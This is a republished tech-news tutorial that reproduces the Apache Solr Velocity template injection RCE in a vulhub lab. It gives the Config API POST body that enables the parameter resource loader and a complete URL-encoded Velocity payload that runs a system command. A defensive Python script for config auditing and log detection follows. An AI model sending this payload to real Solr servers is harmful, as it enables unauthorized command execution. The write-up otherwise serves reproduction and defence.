2025-02-23 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
In this issue, the editor walks through reproducing the RCE vulnerability caused by template injection in Apache Solr's Velocity response writer. The article is detailed and analyses the issue from a professional point of view; I hope you get something out of it.
0x00 Introduction
Solr is a standalone enterprise search application server that exposes an API similar to a web service. Users submit XML files in a defined format to the search server over HTTP to build an index, or issue a search request with an HTTP GET and receive the result in XML.
0x01 Vulnerability overview
The vulnerability has two causes. First, when an attacker has direct access to the Solr admin console, he can modify a node's configuration by sending a POST request to /<node name>/config. Second, Apache Solr integrates the VelocityResponseWriter plug-in by default; the option params.resource.loader.enabled in the plug-in's initialization parameters controls whether the parameter resource loader may take templates from Solr request parameters, and its default is false.
When params.resource.loader.enabled is set to true, a request is allowed to specify which resources are loaded by setting request parameters, which means an attacker can execute commands on the server by constructing a malicious request. (Source: 360CERT)
0x02 Affected versions
Apache Solr 5.x to 8.2.0, i.e. the versions that have the Config API.
0x03 Environment setup
To build the environment yourself, use the CVE-2019-0193 environment from vulhub.
Start the vulhub environment:
git clone https://github.com/vulhub/vulhub.git
cd vulhub/solr/CVE-2019-0193
docker-compose up -d
Create a Core named test:
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db
Once it is up, Solr listens on port 8983 by default and can be reached at http://ip:8983.
0x04 Vulnerability exploitation
Precondition: the attacker needs to know the name of a Core in the Solr service to carry out the attack.
The name shown in the figure above is the Core name.
Send a POST request to /solr/test/config with the following body (this modifies the Core's configuration):
{"update-queryresponsewriter": {"startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true"}}
Then send the request from the public PoC:
http://ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($str.valueOf+[1..$out.available()])$str.valueOf($chr.toChars($out.read()%23end
The command can be executed successfully.
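From a defender's side, the two observable events in the steps above are the Config API write that enables params.resource.loader.enabled and the wt=velocity request that carries an inline v.template.* parameter. The script below is an added example (not code from the page or from the Solr project) with assumed function names: it audits a GET /solr/<core>/config response for a VelocityResponseWriter with the loader enabled, and labels constructed Jetty-style request log lines.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample of a GET /solr/test/config response after the POST above.
SAMPLE_CONFIG = json.dumps({"config": {"queryResponseWriter": {
    "json": {"class": "solr.JSONResponseWriter"},
    "velocity": {"startup": "lazy", "name": "velocity",
                 "class": "solr.VelocityResponseWriter", "template.base.dir": "",
                 "solr.resource.loader.enabled": "true",
                 "params.resource.loader.enabled": "true"}}}})

# Constructed Jetty-style request log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2020:10:00:00 +0000] "GET /solr/test/select?q=1&wt=json HTTP/1.1" 200 311',
    '10.0.0.9 - - [01/Jun/2020:10:00:03 +0000] "GET /solr/test/select?q=1&&wt=velocity'
    '&v.template=custom&v.template.custom=%23set($x=%27%27) HTTP/1.1" 200 58',
    '10.0.0.9 - - [01/Jun/2020:10:00:04 +0000] "POST /solr/test/config HTTP/1.1" 200 40',
]

def audit_query_response_writers(config_json: str) -> list:
    """Names of writers that let request parameters supply Velocity templates."""
    cfg = json.loads(config_json).get("config", {})
    flagged = []
    for name, writer in cfg.get("queryResponseWriter", {}).items():
        loader = str(writer.get("params.resource.loader.enabled", "false")).lower()
        if "VelocityResponseWriter" in str(writer.get("class", "")) and loader == "true":
            flagged.append(name)
    return flagged

REQ_RE = re.compile(r'"(GET|POST) (\S+) HTTP/')

def classify_request(log_line: str) -> str:
    """Label one log line: 'velocity-template', 'config-api', or 'ok'."""
    m = REQ_RE.search(log_line)
    if not m:
        return "ok"
    method, target = m.group(1), m.group(2)
    parts = urlsplit(target)
    if method == "POST" and parts.path.endswith("/config"):
        return "config-api"          # Config API write: review who changed what
    params = parse_qs(parts.query, keep_blank_values=True)
    if "velocity" in [v.lower() for v in params.get("wt", [])] and any(
            k.startswith("v.template") for k in params):
        return "velocity-template"   # wt=velocity plus a template from the request
    return "ok"

def scan_log(lines) -> dict:
    """Count labels across a log; anything other than 'ok' deserves a look."""
    counts = {}
    for line in lines:
        label = classify_request(line)
        counts[label] = counts.get(label, 0) + 1
    return counts
```

The config check is the durable one: a writer that keeps params.resource.loader.enabled at true stays exploitable even after the suspicious requests have aged out of the log.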
That is how the editor reproduced the RCE vulnerability caused by template injection in Apache Solr's Velocity response writer. If you have run into similar questions, the analysis above may help you understand it. To learn more, follow the industry information channel.
© 2024 shulou.com SLNews company. All rights reserved.